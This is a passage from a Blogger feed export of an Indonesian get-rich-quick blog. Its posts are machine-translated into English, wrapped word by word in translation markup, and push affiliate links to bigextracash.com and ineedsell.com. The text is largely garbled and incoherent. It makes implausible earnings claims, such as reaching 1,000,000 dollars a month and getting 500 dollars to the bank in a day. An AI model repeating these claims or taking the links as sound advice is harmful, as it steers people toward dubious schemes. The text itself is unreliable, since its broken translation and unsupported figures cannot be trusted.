src='https://blogger.googleusercontent.com/tracker/5397170308485192825-7247500583123356299?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/7247500583123356299/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/get-from-google-pagerank.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/7247500583123356299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/7247500583123356299'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/get-from-google-pagerank.html' title='Get from google pagerank'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nLUUYT3afN4/TTv_dmvrsHI/AAAAAAAAADI/747JCuTj8YI/s72-c/google-page-rank.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-8108090864876992196</id><published>2011-01-19T20:57:00.000-08:00</published><updated>2011-01-19T20:59:53.236-08:00</updated><title type='text'>white black 1000trik.blogspot.com get more money</title><content type='html'>&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;search&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;business&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;guarantees&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;financial&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;?....&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;what&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you are&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;looking for&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;business&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;become&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;rich&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;though&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;?....&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;want to earn&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;internet&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;without a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;PPC&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;CPM&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;CPA&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;inventasi&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;unclear&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;right&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to give&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;not&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;commit fraud&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the PPC&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;business&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;way of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;doing&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;so&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;invitor&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;banned&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you are afraid&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;again&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;do business&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;all&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is real&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;but&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;has&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;proven&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;100&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ways&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to do business&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in a  positive&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;negative&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;even&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;breathing&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;occurs&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;the blog&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;so that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;100&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;%&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;very often&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;banned&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;but&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the author&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;does not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;seputus&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;it&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;CPM&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;already&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;reached  1,000&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;000&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;per&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;month&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;how&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;did that happen?&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;...&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is considered&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a business&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;make money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;without&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;hard&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;work&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;of all&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;was a lie&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;business&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;must have&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;capital of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;0&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;%&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;true&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;, this is a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;post&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;contains the&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;true&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;history of the&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;waterfall&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the world&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Internet  business&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;until the&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;fall&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;also&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;wake up&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;more&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;than 1000&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;times&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;but&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the author&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;breathing&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;give up&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;tuh&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;...&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in business&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;capital only&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;works&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;up to&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get a&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;degree&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;SEO&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;as&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;of the most&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;insane&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;close the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;depat&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;head&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;alone&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;was&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;accepted&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;again&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;google&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;friends&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;who&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;provide&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;business  opportunities&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;more&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;quickly&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan  alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://BigExtraCash.com/_09fe7612.htm"&gt;&lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;here&lt;/span&gt;&lt;/a&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;I&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;get a&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;dollar&lt;/span&gt;&lt;span class="" title="Klik untuk  terjemahan alternatif"&gt;-producing&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;business opportunities&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;more quickly&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;no&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;less&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;than 1&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;month&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;was&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;able to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;take the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the bank&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;directly&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-8108090864876992196?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/8108090864876992196/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/white-black-1000trikblogspotcom-get.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8108090864876992196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8108090864876992196'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/white-black-1000trikblogspotcom-get.html' title='white black 1000trik.blogspot.com get more money'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-5071043197664612669</id><published>2011-01-19T20:30:00.000-08:00</published><updated>2011-01-19T20:44:27.596-08:00</updated><title type='text'>bisnis tanpa blog dan website terbukti</title><content type='html'>&lt;a href="http://www.bigextracash.com/aft/09fe7612/11110053.html"&gt;&lt;img src="http://www.ineedsell.com/images/banners/html_banner400x300_13.jpeg" alt="It s all about Jehanzeb Memon." align="left" border="0" width="400" height="300" hspace="20" /&gt;&lt;/a&gt;&lt;h1&gt;Free&lt;/h1&gt;&lt;h2&gt;&lt;a href="http://www.bigextracash.com/aft/09fe7612/11110053.html"&gt;It s all about Jehanzeb Memon.&lt;/a&gt;&lt;/h2&gt;buy and sell &gt; computers&lt;br /&gt;&lt;p&gt;It s all about Jehanzeb Memon.. This website will provide your needs... It eill provide you to do as you want... You can suggest that this thing on website must be on.... You Can also use many more function through this website.....&lt;/p&gt;&lt;p&gt;&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;selling&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;their own products&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;with&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;promotions&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;invitor&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;others&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;every&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;booking&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your own&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;product&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the latter&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your website or  blog&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ineedsell.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;provides&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;comfort&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;doing business&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;do not&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;need&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;doing&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;business&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;PPC&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;CPM&lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;even&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;suft&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;paid&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;only&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;getting&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;into&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;ineedsell&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you are able to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;enter&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;kepaypal&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;puluan&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;bank&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;directly&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a more&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;comfortable&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;anymore&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in this  business&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to provide&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;part&lt;/span&gt;&lt;span title="Klik untuk terjemahan  alternatif"&gt;-time&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;job&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;for&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;us&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in generating&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;even more&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;money&lt;/span&gt;&lt;span title="Klik untuk  terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;I was&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;one day have&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;the money&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;directly&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;back&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;500.00&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the bank&lt;/span&gt; 